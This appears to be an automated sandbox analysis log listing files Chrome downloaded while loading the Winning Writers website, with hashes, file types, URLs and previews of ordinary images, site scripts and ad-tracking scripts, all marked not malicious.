                                                                                                                                                                                            Preview:$("[placeholder]").focus(function(){var i=$(this);i.val()==i.attr("placeholder")&&(i.val(""),i.removeClass("placeholder"))}).blur(function(){var i=$(this);(""==i.val()||i.val()==i.attr("placeholder"))&&(i.addClass("placeholder"),i.val(i.attr("placeholder")))}).blur().parents("form").submit(function(){$(this).find("[placeholder]").each(function(){var i=$(this);i.val()==i.attr("placeholder")&&i.val("")})}),$(function(){function i(){$(this).addClass("hover"),$("ul:first",this).css("visibility","visible")}function t(){$(this).removeClass("hover"),$("ul:first",this).css("visibility","hidden")}var o={sensitivity:3,interval:200,over:i,timeout:200,out:t};$("ul.dropdown li").hoverIntent(o),$("ul.dropdown li ul li:has(ul)").find("a:first").append(" &raquo; ")}),$.browser.msie&&$("body").addClass("ie"),$("a").each(function(){var i=new RegExp("/"+window.location.host+"/");i.test(this.href)||$(this).click(function(i){i.preventDefault(),i.stopPropagation(),window.open(this.href,"_blank")})}),$(docum
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 980x450, components 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):113332
                                                                                                                                                                                            Entropy (8bit):7.93042859401063
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:PlQt765imca817OMMBXgkgde20ny8EEr1O/MRSJiZ9:696l07OMMBXT6z0ny8EEr1GUSq9
                                                                                                                                                                                            MD5:D91A2BA4A6DF5EC5FD816C0E33AE6474
                                                                                                                                                                                            SHA1:947E1790455D9327FE2B36FCBDC7411C5B56575A
                                                                                                                                                                                            SHA-256:6F26EF6155C1B26C338F55545DBAA8AE97FB9A88876E64ADCEA41B72AB957D2D
                                                                                                                                                                                            SHA-512:1A02BD83322882D532A515B8B2B1CB206580A94BD71E7A25DC3A3AB46AB9F3BF8C6AA87526EA876DC7C3B048D6BAB806D8EE0861AE593BF262EDFA025121EA72
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.dba3da3b5, 2023/12/15-10:42:37 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:CD7654A112206811822AE8C6A079CFFF" xmpMM:DocumentID="xmp.did:25F6B95AF20211EE8331DF4817DBDCA3" xmpMM:InstanceID="xmp.iid:25F6B959F20211EE8331DF4817DBDCA3" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:af8f7f60-a3dc-4c21-8022-e0a7ef03d3d1" stRef:documentID="adobe:docid:photoshop:f4c8b935-f6c9-4147-9a0d-66ff072c6846"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..............................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 980x450, components 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):109454
                                                                                                                                                                                            Entropy (8bit):7.921174839939934
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:LG6fi71iaYPCfcZTk9GLwGV5qCpMprfPotPRQ:LG6fiMaYPecZQ9fGV5qNpPmZQ
                                                                                                                                                                                            MD5:32628DE6ED9BD0A9D0C52971A20BDC62
                                                                                                                                                                                            SHA1:B626FA702BF55B397102C635B17B6E41E6C0C9FA
                                                                                                                                                                                            SHA-256:183AD99C5B2C46A35EABA79AED68CA9CB035A674587511DC478517F1002F3448
                                                                                                                                                                                            SHA-512:9378B59EB10F09F2BB69DC5B94F000F8D2A06F564E02E0BA1C3BBC88AA26ABF79C6F93E7E6081CB0406EB642A1E2AE672806E0B4422E6E80EF7005EA1AAC2787
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/graphics/home_page_slide_victor.jpg
                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......Z......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.f354efc70, 2023/11/09-12:05:53 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:CD7654A112206811822AE8C6A079CFFF" xmpMM:DocumentID="xmp.did:A8D2BFF7BBCA11EEAC63BF9052C4EDD5" xmpMM:InstanceID="xmp.iid:A8D2BFF6BBCA11EEAC63BF9052C4EDD5" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:942ca8e1-258a-45c1-b271-1531c1452f54" stRef:documentID="adobe:docid:photoshop:50d27b12-66c3-e247-89a4-128a9d55d1b5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..............................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (58876), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):58876
                                                                                                                                                                                            Entropy (8bit):5.405683338218142
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:buY9NdAkLYPFvFkxF94zPnSJpSFDKNo5/H:buQdApFoF94zPnSJpSFDP5/H
                                                                                                                                                                                            MD5:4328E910DE583AD53B3A7A76455AF005
                                                                                                                                                                                            SHA1:E040010E5EF4121A3A163AACDC664D6AA4AFEC74
                                                                                                                                                                                            SHA-256:D4963B8AFEBFA0063B5D17B4C80F49BCE702A37EA5C9B91BB3C996BB9DEA4B60
                                                                                                                                                                                            SHA-512:F807BA8B0AE2D5387E93E292918EEB4D7D1AC7635566A38EE2E101FBE8A7C6C23E704770EFCB1401EB5D1385605CBFB15F0A840AC150770049D2A4D6CA9A0DFA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://static.ads-twitter.com/uwt.js
                                                                                                                                                                                            Preview:!function(){var t={6173:function(t,e,n){var r;t.exports=(r=r||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==n.g&&n.g.crypto&&(r=n.g.crypto),!r)try{r=n(2480)}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")},o=Object.create||function(){function t(){}return function(e){var n;return t.prototype=e,n=new t,t.prototype=null,n}}(),a={},c=a.lib={},u=c.Base={extend:function(t){var e=o(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 118 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):3147
                                                                                                                                                                                            Entropy (8bit):7.92208098001136
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:GFwE2m5Cdlm8hp47zIRYVkGIg5wQLrZD8+midGjzqfSDylBdthF0AlTOG:YwRgGl7icRYVk6wQHZ44t6OhF0NG
                                                                                                                                                                                            MD5:0732149C7F9BFCC0C32AB5005D5D5381
                                                                                                                                                                                            SHA1:9568581474715305C161A489DA2AE6F7AE77B931
                                                                                                                                                                                            SHA-256:78A94B3A3CFD0101DA72E3D20BD49503C2E2116383EDAE5C9443C2EEA255EA59
                                                                                                                                                                                            SHA-512:C1A6DF5E32D3222B3D982F9791426FC851AD8CC04E180C2423B1FB98ED160A41DED089CF3D64F6A046B4BA03CAEDE2101AD4A453B78EA8EA8D772A147D649152
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/images/social-sprite-2019.png
                                                                                                                                                                                            Preview:.PNG........IHDR...v..........ShK....sRGB.........gAMA......a.....pHYs..........o.d....IDAThC.Z{pT......<@..cH.A.e@..G..$............h.v.j[....?t:.j....T.!.*..h#$...+...:.@.g.b.}...w...&........{.w.=.|.;.{....... 5)).@.9M.,$A7..T....TO.h.;.u.....+....g..."..4!.P.MA.z.O..z)E...k.z.+..3f...2...4...j....z..~.......(**..p..|o6..=....>\......f.hm]].i.. .*.].]...$.,....I...x...~......s.....|..^..!.?.a....f..\.......GA%.g.L.j....h....@.'..%...i.-..q...7....>@.j..8.......qB.].a>PU../.9/...d..JL.|.....j....].z.....G.eqc.......x...J.J..f..w5+.`.>..q...!..WlYY.H..w..wZ.D!..BVTU........p.).zt.j.J...\).*++..zB./.OK.IZ..... ..T.].w.......R........6(w:..SM.P\.fn.. ..~..W.D3..^.....2......c.B..U*..`...zx......G...!..,[.6.v....);+.&L.@O?....L.O..)...Nt..W..x......"......v...KI_.......sZ...i$...1......3...;.T..0:....G..<.....^...,.r....._.j..&..3H....U...2(Y.D...!....p:....G..C.....q.>u....9Z=.mp[.......u%.)e. .......["V.Q..N....T$.........>...tjp.0..9..(p..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):81457
                                                                                                                                                                                            Entropy (8bit):7.993480782137265
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:1536:L+up03fjmp29GXdqxApZVqAwAmg4hNRk+hRv9ofmHd6rssGFi3pSYAVNL0:Rp0L9GXdqzmmgCLSmHda73sV0
                                                                                                                                                                                            MD5:A493C5347CC972C58EC6EDBE3CB22927
                                                                                                                                                                                            SHA1:D2C70D196D4C576F080F1AE18C9D878AAE5FC7C1
                                                                                                                                                                                            SHA-256:3E7284E0ACE8D03897335CCC163B16658D2B33F66193426EA97E8D3E69760398
                                                                                                                                                                                            SHA-512:5DEC20714CC50A1B9D0DCC245F70462CE0F35B9DA488F92B674C877BE3622831A7652380C34BF7F38BE8DC2E4014E47996B87848FFFEC03A3929DA80933FDA96
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/graphics/staff/jendi_reiter_by_ezra_autumn_wilde_2023_square_200.png
                                                                                                                                                                                            Preview:.PNG........IHDR..............X......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:663bb13f-2490-4f33-b197-da6ca853dd87" xmpMM:DocumentID="xmp.did:7E8460D995E411EEBD159D1077689FB6" xmpMM:InstanceID="xmp.iid:7E8460D895E411EEBD159D1077689FB6" xmp:CreatorTool="Adobe Photoshop 25.2 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e1ae9024-45a5-4389-a222-60d502de5934" stRef:documentID="adobe:docid:photoshop:d7c5f106-b245-9a4a-8dbd-0fb72b6005a2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.....:@IDATx.l.Y.,
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):86
                                                                                                                                                                                            Entropy (8bit):4.779486743739521
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YTyLV/Vf1+xNVcSLQzRE9LduVB4:YWLV91iDLQmpdIB4
                                                                                                                                                                                            MD5:EA03273602AC31C0858FA2D9A1895526
                                                                                                                                                                                            SHA1:4F8AFE25482A22C6858AF1F58E55D83F9DF9B854
                                                                                                                                                                                            SHA-256:98D77039EA9249B3DCE91AD7B467EE382F29DAA61213C3E2737BD4A8786C8801
                                                                                                                                                                                            SHA-512:77FF06E103CA553FAD14E5F865764CDA76777F83800C439ED91B22B26935146863F9D0C3BBBD3EE95E02C69A1A1C29D0C12A5D9B9D1D619CEEBCF1DCCB422238
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.redditstatic.com/ads/conversions-config/v1/pixel/config/t2_11an1ubt_telemetry
                                                                                                                                                                                            Preview:{"version_hash":"49267bce","url":"https://www.redditstatic.com/ads/49267bce/pixel.js"}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:gzip compressed data, from Unix, original size modulo 2^32 43473
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):12126
                                                                                                                                                                                            Entropy (8bit):7.9862712081532035
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:26MV2PEUWRRI2V6SKbQ5W3YmOCf3OrXT9WVcx6tbLRtbaa01P0jGwWsEnJqVFGUc:+tjRIm6SoITu3khUrRkaVjTWsEnsKOmH
                                                                                                                                                                                            MD5:5E9AC3A42B557BF8CA38CF2E8BABA70B
                                                                                                                                                                                            SHA1:384C001B3FA47AD5D2A6001A05C700DF75492609
                                                                                                                                                                                            SHA-256:C5E0F994B0C6C1C43D0C0FDE35AE8B72D458D31A8B2A17CA6E030C3C8D3C6FF2
                                                                                                                                                                                            SHA-512:65EE94F5AB3621A8220BECB8AF3F7A348DA789E89F22007D2484B5F6365AD4100EB9178F18C83BEEDFBBDCBADE0683ACFFC94CE5D22A57AC38DBFBE119524D5E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:...........;ks.....n..i....k\....<.L..J..P"$F.q....{.%....;;.6.B.}N.w.>.....I.0(E*F.J..t$T=4......yc....J...T.4..%......."\..F......d..%...U52..c+>F..f..JV...... ......."tW>..[.x....L.Q.P.u't..\]wF..w=.._.z....Boi...'.c.FIl<m6M..]u.;..K....F..'.Y.R........AK.M..3.c.N.....D....yf..&...Y2oz......uS..Q.j.]&$...8[.i..6cT..L5.....#..Q.&hj;I.=6I.L.^,F..v;z\&...S4.....N.h...|.].@..D..B.=a..pz.P.....e.5...vQ....G~.fK...2..A.r9ko...ihO...R...[-...}.=.T.39O!.3"....(.....C.....q...8.E..6..*.}..]t.D...'gN.;.2.>....k.+.S)D.....0...".Q.i.,./r.(....Nn.Tmhz.m.Kx]Zj....y.<...;.D.r..H...U....@%.Kb...W.V.{..`i......._...'.!)5.CGd.....e.+^...E.8.Q..d.....4.#...|_.7.UCm..I{.{.f['...`..c:mBjMp......N..F..1.>*. YR...N....~te.B.}n....M..q.<...x.....N:.6.....CT..+^.1........!;...8....P..d+>.q",3..qW.....qb....:....C@ey.$..c.D.e..D...-..<...!......$.d...I`sj.;yplf.....<Y.2I.y.L.Du1".K..... gWn.4.2.....l..0ri....I...Q......X.x.}.?.......A.I..).g.a4.....o..-c
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):244531
                                                                                                                                                                                            Entropy (8bit):5.4538573889137245
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:8FLeYH8AtPJ137OeR8NteqZEbkxZNsucrl0xYurPK713E3:8FLeYc+PJxH8NNfFcrHurPK7136
                                                                                                                                                                                            MD5:36E181233B4F306FA5B8DDA3B15201E2
                                                                                                                                                                                            SHA1:FDCCF3ABC17A9DE5CE2DBB5AD888C9698C7D2E13
                                                                                                                                                                                            SHA-256:43A683165A27224EF2D2717BD57C8C203AA570CE39140504D086562EEFBB0F1F
                                                                                                                                                                                            SHA-512:C754FC2C7B366E4475EFB11CF5C8F4F64427E00D7149F7DC10C7E4A726674335143F155F429ACF44210E93F8AA356E06879219E21A6AABE6AF92981E5C905348
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                                                                                                            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):754
                                                                                                                                                                                            Entropy (8bit):4.316666117349511
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:If91R/lrBJz41bs+R4rBJhZBo2QfChKiOErBJz41bs+R4rBJhZBo2Qo:IxlrDc1bsJrDP6nChKjErDc1bsJrDP6g
                                                                                                                                                                                            MD5:8A46C57F8BECEB76CF12FA08279E7D7A
                                                                                                                                                                                            SHA1:D9CBA39B3415C55DF2817D952B1BFE7B3201C6D7
                                                                                                                                                                                            SHA-256:7931BD3BC1307FEFDA7F279C2D2DA50AC69BFA5B28E73B62AD0EF787A03DB6DD
                                                                                                                                                                                            SHA-512:16257DB25AC0440B4B5D18F4E079F2A42FE1F1F8A5C11E466CBF8C8BB27BF980899FE1143B554027FD04C9061C9E28BF9A6FF90080A9DE812D6AB70D9A14F3A5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/js/feed.js
                                                                                                                                                                                            Preview:.// var $ = jQuery.noConflict();..// $(document).ready(function () {..// if ($(window).width() > 499) {.// if($('.feed-height').length > 0){.// $('.feed-height').matchHeight({.// byRow: false.// });.// }.// }.// if ($(window).width() < 500) {.// $('.feed-height').matchHeight({ remove: true });.// }. .// });..// $(window).on('resize', function () {...// if ($(window).width() > 499) {.// if($('.feed-height').length > 0){.// $('.feed-height').matchHeight({.// byRow: false.// });.// }.// }.// if ($(window).width() < 500) {.// $('.feed-height').matchHeight({ remove: true });.// }..// });..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4883), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4883
                                                                                                                                                                                            Entropy (8bit):5.815183320440571
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRU/eEtytU73:1DY0h8Rx47OIqWbZWeEtyC
                                                                                                                                                                                            MD5:21048D250ED86F9185985A41480DB220
                                                                                                                                                                                            SHA1:19E8B812932AF41D09ACF982436E216A5AE1FF9D
                                                                                                                                                                                            SHA-256:137AE599495B8BA841BBA00A0F7F02100E559017E95ABAB31F96EF24A2781D36
                                                                                                                                                                                            SHA-512:7D0F463BF42182112F6D7CDE17CB0B7A996AE8F8A44E63E5EF09CBA75879B269E7515A84497CA67C902B790921A15CBEFE5A0AAE10E607F33E9E1DB5A3D851E5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072733940/?random=1731960046417&cv=11&fst=1731960046417&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 44 x 152, 8-bit colormap, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1362
                                                                                                                                                                                            Entropy (8bit):7.713273225741816
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:i0Y7YKsmirhmm6l5ukc5qeCD4S6/b5bv2l0lIm+LBtn8lFp5UMma:0/slA13uXkewQb5bvFz+D8L8Mma
                                                                                                                                                                                            MD5:783D4031FE50C3D83C960911E1FBC705
                                                                                                                                                                                            SHA1:17DF19F97628E77BE09C352BF27425FAEA248251
                                                                                                                                                                                            SHA-256:B9D6FDDB0988440902FCFC72F371ECFA80EE2EB36073F9EEBC17449EE41C886F
                                                                                                                                                                                            SHA-512:57DD3FC8C84DE71D97AB5E010FC522C893D7333E2E31C2E1037A0A88E2F0CA8CA836B86C453713C7A04D5900B014E36AC1E4B7723764E36A15929030968A1040
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...,............P....PLTE.............................................???...........................ggg............???.....ggg.............................................NNN...555.........zzz]]]hhh,,,..."""...AAAm....../tRNS........#'-:DHSU]iilmyz........................./......IDATx^.[s.L....C.....$.j)f..........M....X.7{....:=#..*.....:..R.I...$].t...F..L.....;..k.......7.......M.l.{A...2K.....>.+........a..j....n...(.....UZ....Dzhh...i...{...n....[...3....f..9f._..bM......TX......./.9.].$..jS.G6z.@v`..C...hR. ...,.0e..... ._p.)..uz.H..%.f..........._..s:.|u....%..R..M.-.Bo...Ad...gH/.)~....r.u.ds..S..(.Ze....Qw0...c..P.=...".[F.).m.1..I.H.iq..S....6..d..*sR..9v.m......\.$....RI..x...sl..I..i.=..-.l.V.pM..n.m.....y..B...8*.C5..._...r.......C._.M.m.$.|.,.l....O.(.....e...D}._L.i...R...@.do6~.Y..'.&..1.e.X6.U...P..O].-_0V;&6..w.Sz.......W..6..].T.G<.J1...x.X...cG.\... .^.....CF..G3.,]j~vN...c_..H......y..2<..h..+.U0R..>.....}..C93-
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 970 x 250, 8-bit colormap, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):111088
                                                                                                                                                                                            Entropy (8bit):7.988756209843177
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:f52uM1uXUeMfGK7qPKRCKHuLJPur33Zzlu/P:fMuMIw+PTa2JkZzlQP
                                                                                                                                                                                            MD5:3EAD745493A5CB6CD6D68596CED4161D
                                                                                                                                                                                            SHA1:6DD6EB3A4DF80B470066D6BD0E2470BD3BB01111
                                                                                                                                                                                            SHA-256:6421F937E92DA66A68B43B650CA55A3C1720E321F41A44D2F4E202013EBBFAAF
                                                                                                                                                                                            SHA-512:1D3FA6B6C2484E68C601F8114AE4C802ACF836FF195F06DABCAC08F56A31B16E47FB8ABC9C9646BB279EBF9F320D49937DDFA6FD1CBADE56A7FAA7ACA743C2A5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/graphics/tomstory/tom_story_wide_banner_2025.png
                                                                                                                                                                                            Preview:.PNG........IHDR.............N#N6....pHYs..........+......PLTE................U...&%...]..4.......,..C..M..;.....H......#"...........c.....'...%#............ .}" ............x..............i........o..t....(.................yZH........................IAI...........B..........#M...S............o]...v.....fP.......=79..e...>-).....-=e..........2...}i....{...........5.iRF...3# ....7..5WLLO........]p....$-JY..o|.xbUV.....l[k..Q:/......xl..eku.....2B?.........z_..n"'2....v..i.....z.....].....j.....N~.........`FECZs..\I-.......h..9Kwyvv.X?UWXf..uVUd..-,...QdlGQi'*i7:.w.....Z]kQS.u..wL6........6I\........]....wP....q.k.......mRpZY..Uix..........sr......W....|......e?..}.......xt..p.nf.|......@.....w. k;4...__.p..p.;........+0.z..DC.=.XN...{.....cX......ze..d.'..Y....iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3121
                                                                                                                                                                                            Entropy (8bit):5.078683738502872
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:NAvEI1gv+jyVx2BegHppvkMFALhoj9jtevxNEl/YuRlgaYyKTQgQpMvQ:BItyVx2cgHppvb6LhoBIN0/ZljDKVQpF
                                                                                                                                                                                            MD5:FF14E4812B7F512E620B1AD35542BCFC
                                                                                                                                                                                            SHA1:C40C5F777E7A2F63E7B731B3CDB1FE9C806B23AE
                                                                                                                                                                                            SHA-256:C4FB91BEFCF134B81ECFA1C586E1F9D6426C8F4FC1F6C130AC1FDDB49AB5DF96
                                                                                                                                                                                            SHA-512:59E0276314814C6E033FBC81AB9F2541A86BFB85FC263397D0E3F3C1A0CB0C8E5FE2F833998245462903D8A7E9E499D2685B8FC44964935AD282E4E175753D78
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
